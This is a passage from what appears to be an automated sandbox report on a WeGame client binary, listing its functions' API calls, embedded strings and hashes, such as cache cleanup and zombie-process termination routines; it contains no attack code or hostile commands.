                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004071D8
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040723C
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407338
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004073F4
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 004075DC
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407698
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040784C
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00407871
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,?), ref: 004078EB
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004079ED
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407A51
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407B1D
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407BD9
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407DC7
                                                                • _wcsnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?), ref: 00407E83
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,00000001), ref: 004070D8
                                                                  • Part of subcall function 0040BF70: memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,00402114,?), ref: 0040BF9A
                                                                  • Part of subcall function 0040BF70: memmove.VCRUNTIME140(00000000,?,?,?,?,?,?,?,00402114,?), ref: 0040C051
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,-00000010,00000000,?), ref: 00408061
                                                                • LeaveCriticalSection.KERNEL32(?,?,?,-00000010,00000000,?), ref: 00408086
                                                                  • Part of subcall function 0040BF70: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0040C0A1
                                                                • EnterCriticalSection.KERNEL32(?,85A35C35,?,00000000,?,000000FF), ref: 004080F4
                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00408155
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _wcsnicmp$_invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave$memmove
                                                                • String ID: ($VFSHelper::FileExists() $VFSHelper::FindFirstChild() $VFSHelper::FindNextChild() $VFSHelper::GetFileInfo() $`
                                                                • API String ID: 921773079-2146136442
                                                                • Opcode ID: a00391b10745424fb60a2081921dcf60f3faedfa72357ca4dc4d95c9a5998c77
                                                                • Instruction ID: 8c1ef6e9cadccdb1218b1aa8379d3fe16dbc2c95ae20b3109c692f865cbdf85e
                                                                • Opcode Fuzzy Hash: a00391b10745424fb60a2081921dcf60f3faedfa72357ca4dc4d95c9a5998c77
                                                                • Instruction Fuzzy Hash: 52239F70E04258CFDB14CFA8C984BAEBBB1AF45318F24856ED405BB3D1D738A985CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0041E740 Relevance: 55.2, APIs: 9, Strings: 22, Instructions: 919COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000200), ref: 0041E8E1
                                                                • memset.VCRUNTIME140(?,00000000,00000034), ref: 0041E935
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: 4$TA$VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() $VFileSysBase::ReadFDTV1() AESFilter::SetKey()$VFileSysBase::ReadFDTV1() CoderFilterA::SetSeedID()$VFileSysBase::ReadFDTV1() CoderFilterW::SetSeedID()$VFileSysBase::ReadFDTV1() FDT entry$VFileSysBase::ReadFDTV1() FDT entry$daeh$daeh$liat$liat$vfs
                                                                • API String ID: 2221118986-4278562756
                                                                • Opcode ID: 518d641a392e8cc669b623aeeba5e952d02b0d2a04d0a0a4f0665361e109163e
                                                                • Instruction ID: 028074c84138df462f802107ffae3a7b19df5b03f0a308a1c25185e3789f15c4
                                                                • Opcode Fuzzy Hash: 518d641a392e8cc669b623aeeba5e952d02b0d2a04d0a0a4f0665361e109163e
                                                                • Instruction Fuzzy Hash: B3928B749002299BCB21DF15CC88BDAB7B5AB44304F1481EAE409A7392D779AFC9CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045E17A Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 217fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045E184
                                                                • memset.VCRUNTIME140(?,00000000,00000208,00000CF8), ref: 0045E199
                                                                • GetEnvironmentVariableW.KERNEL32(appdata,?,00000104), ref: 0045E1B2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E1C0
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E24D
                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0045E263
                                                                • wcsrchr.VCRUNTIME140(?,0000005C), ref: 0045E272
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E287
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E295
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0045E2BD
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E2D4
                                                                • memset.VCRUNTIME140(?,00000000,00000250,?,00000104,%s\*.*,?,?,00000000,00000208), ref: 0045E2FF
                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0045E315
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 0045E32F
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E36F
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00485FE0), ref: 0045E392
                                                                • wcscmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00485FE4), ref: 0045E3B4
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045E40F
                                                                • FindClose.KERNEL32(00000000), ref: 0045E41E
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E435
                                                                Strings
                                                                • appdata, xrefs: 0045E1AD
                                                                • %s\*.*, xrefs: 0045E2E0
                                                                • %s\%s, xrefs: 0045E3D3
                                                                • [CleanCache] not find temp path., xrefs: 0045E473
                                                                • [CleanCache]succ find temp path., xrefs: 0045E1FA
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E1E4, 0045E459
                                                                • %s\tencent\wegame\qbcore91\cache, xrefs: 0045E2A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$File$Find$?get_log_instance@base@@Logger@1@SimpleString::operator=wcscmp$AttributesCloseEnvironmentFirstH_prolog3H_prolog3_H_prolog3_catch_ModuleNameNextVariablewcsrchr
                                                                • String ID: %s\%s$%s\*.*$%s\tencent\wegame\qbcore91\cache$[CleanCache] not find temp path.$[CleanCache]succ find temp path.$appdata$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1552715262-3066486329
                                                                • Opcode ID: 9a2d8ec46530e4738085c5a7ea1d63d374ad8af8d3cda6646221057f8eb07a82
                                                                • Instruction ID: a589235813380b5add3acdeafe7cbd7c0879f177c039c22a2006609a02e6e5b7
                                                                • Opcode Fuzzy Hash: 9a2d8ec46530e4738085c5a7ea1d63d374ad8af8d3cda6646221057f8eb07a82
                                                                • Instruction Fuzzy Hash: 6D8132B1E00318AADB24EB65CC85FDE737CAF05319F5005EAE509A2181DB789F89CF59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00462478 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 138processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00462482
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 004624AA
                                                                • GetCurrentProcessId.KERNEL32 ref: 004624B1
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004624DE
                                                                • memset.VCRUNTIME140(?,00000000,00000228,00000002,00000000), ref: 004624FC
                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00462516
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00462540
                                                                • ?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,00000000,0000022C), ref: 00462551
                                                                • OpenProcess.KERNEL32(00100411,00000000,?,?,00000000,0000022C), ref: 00462590
                                                                • SetLastError.KERNEL32(00000000), ref: 004625A2
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004625AB
                                                                • GetLastError.KERNEL32 ref: 004625B1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 004625BD
                                                                • CloseHandle.KERNEL32(00000000), ref: 0046261F
                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00462633
                                                                • CloseHandle.KERNEL32(00000000,00000000,0000022C,00000000,0000022C), ref: 00462641
                                                                Strings
                                                                • [KillZombieProcess] try to kill:%d result:%d, xrefs: 004625FF
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 004625E1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseErrorHandleLastProcess32U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?extract_name@common@ierd_tgp@@?get_log_instance@base@@?u8to16@common@ierd_tgp@@CreateCurrentD@2@@std@@D@std@@FirstH_prolog3_Logger@1@NextOpenSimpleSnapshotString::operator=TerminateToolhelp32U?$char_traits@V34@@V?$allocator@V?$basic_string@W@2@@4@@W@2@@std@@memset
                                                                • String ID: [KillZombieProcess] try to kill:%d result:%d$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 1726103202-2709478007
                                                                • Opcode ID: a3ea2f82d98af1e53a5278d7327f1796622590d35c4b428aaf1b81fc3c624403
                                                                • Instruction ID: ba1f9b117192c64519f23e48f9759ed13cd68eaea0b51d81efa5aa473262e887
                                                                • Opcode Fuzzy Hash: a3ea2f82d98af1e53a5278d7327f1796622590d35c4b428aaf1b81fc3c624403
                                                                • Instruction Fuzzy Hash: 8251A370D01248ABDB15EFA5CD99BDDBBB4EF08304F10406EE109B7291EB785A85CB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00438D60 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 325COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memmove.VCRUNTIME140(0000E845,' is not a number.,00000012), ref: 00438F18
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 00438F9F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 00438FD5
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,00000012,00000000,' is not a number.), ref: 0043901D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memmove
                                                                • String ID: ' is not a number.$-
                                                                • API String ID: 15630516-3976447000
                                                                • Opcode ID: 4f83ba59974917499badd6f17ad198da8598a783605e80dd1de6cba809c897d7
                                                                • Instruction ID: ecfde5653b8913e6ff9fcab30981d65c5d9a23de95a72647fec365aad8164779
                                                                • Opcode Fuzzy Hash: 4f83ba59974917499badd6f17ad198da8598a783605e80dd1de6cba809c897d7
                                                                • Instruction Fuzzy Hash: 65C1EF70A002098BDF18CF68C851BAEBBB2FF5D314F24511EE415AB391DB39AD41CB98
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00458223 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 215COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ExceptionH_prolog3Throwisprint
                                                                • String ID: 0123456789ABCDEF$0123456789abcdef$char$integer
                                                                • API String ID: 3477395652-1315984771
                                                                • Opcode ID: df23fe3285ffdda783cb0f10b21b18fe0ea1472d252b8c4ebd68b4fbf311249e
                                                                • Instruction ID: cae2f423a0d31ab10e0072413deee0e0e4324c30c0583a28acb7d2febd1713e9
                                                                • Opcode Fuzzy Hash: df23fe3285ffdda783cb0f10b21b18fe0ea1472d252b8c4ebd68b4fbf311249e
                                                                • Instruction Fuzzy Hash: 3E613471900509ABDB04DE65C861AFF3BA8EF96304F14815FEC46AB342DE39DA4AC794
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00424050 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(f&B,?,?,?), ref: 0042413B
                                                                • memmove.VCRUNTIME140(00000000,?,f&B), ref: 0042415F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00424250
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: freemallocmemmove
                                                                • String ID: f&B
                                                                • API String ID: 2537350866-3893873944
                                                                • Opcode ID: bfcbc0a926684f472e86ac2761fb11532ad5ae0e395f9c7fefa83d020266fb99
                                                                • Instruction ID: e8417d68822cf5112bf801bc42012a279a58ce0c92882e3c63deb248f6f899f1
                                                                • Opcode Fuzzy Hash: bfcbc0a926684f472e86ac2761fb11532ad5ae0e395f9c7fefa83d020266fb99
                                                                • Instruction Fuzzy Hash: CA5177B16083418BC714CF69D88475AFBE0FBC9364F548B6EF4A99B381C734C9498B96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0046E313 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0046E366: memset.VCRUNTIME140(004A8B14,00000000,00000018,?,004A8B00,0046E31B,?,00401E04), ref: 0046E373
                                                                  • Part of subcall function 0046DCF0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,85A35C35,?,?,00475314,000000FF), ref: 0046DD17
                                                                  • Part of subcall function 0046DCF0: GetLastError.KERNEL32(?,00000000,85A35C35,?,?,00475314,000000FF), ref: 0046DD21
                                                                • IsDebuggerPresent.KERNEL32(?,?,?,00401E04), ref: 0046E346
                                                                • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00401E04), ref: 0046E355
                                                                Strings
                                                                • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046E350
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinStringmemset
                                                                • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                • API String ID: 1128651283-631824599
                                                                • Opcode ID: 228c6be23a28e0fdbb33ba3aea6319ec289560a1f48c0386476d0a2641701501
                                                                • Instruction ID: 20c20dcfbf899247eae6e36b83d5e86a8a363c2f5ae13929263885a317d7bebc
                                                                • Opcode Fuzzy Hash: 228c6be23a28e0fdbb33ba3aea6319ec289560a1f48c0386476d0a2641701501
                                                                • Instruction Fuzzy Hash: 2EE0ED74A00751CBD320AF76E5047467BE4BF05748F008D2EE896D7741FBB8E9848BAA
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044CC18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(vector<T> too long,0044BC7A), ref: 0044CC1D
                                                                • ?from_json@jsonbind@@YAHPAXABVValue@Json@@@Z.COMMON(?,?,?,vector<T> too long,0044BC7A), ref: 0044CC2A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?from_json@jsonbind@@Json@@@Value@Xlength_error@std@@
                                                                • String ID: vector<T> too long
                                                                • API String ID: 1902865640-3788999226
                                                                • Opcode ID: d35574038fb4510d89661bec80779160c6f400765671594878e16a2d5b639006
                                                                • Instruction ID: 27b9a68f4dc711354256239e7fd2759f4d0a7778f39d7c1d487427247b278749
                                                                • Opcode Fuzzy Hash: d35574038fb4510d89661bec80779160c6f400765671594878e16a2d5b639006
                                                                • Instruction Fuzzy Hash: 6BC09B7754C70D3655193693B807C8E7BDDD521B64B20841FFA04088917D7FA16155AE
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00428AE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 687COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: U%B
                                                                • API String ID: 0-3843540242
                                                                • Opcode ID: 1cd5bfc5fb53e083c55ae55f97736def69dded4dbb756803a440714c76430d16
                                                                • Instruction ID: 73acf44cce8ea456ab674c7ee7a4a57f108b283854209553cb7dd6d76baf3864
                                                                • Opcode Fuzzy Hash: 1cd5bfc5fb53e083c55ae55f97736def69dded4dbb756803a440714c76430d16
                                                                • Instruction Fuzzy Hash: 9E525EB1E012299FDB14CF59D4806AEBBB1BF88304F6481AED814AB391D779DD42CF94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004246B0 Relevance: 1.8, Strings: 1, Instructions: 583COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: M)B
                                                                • API String ID: 0-1536653526
                                                                • Opcode ID: 63c5ec3d91216ff09cf2517b63621239c873542bd027e39081ca7379c43c6eea
                                                                • Instruction ID: 1d17d8b5bd2f6b4483d8fcc6cf84c089c03a69bdd37c32801f8cd5886dd962ff
                                                                • Opcode Fuzzy Hash: 63c5ec3d91216ff09cf2517b63621239c873542bd027e39081ca7379c43c6eea
                                                                • Instruction Fuzzy Hash: D5423B74A20265CFDB08CF6AD89057ABBF1FB8A300B5582BED555E7351C334AA11CFA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00426F40 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
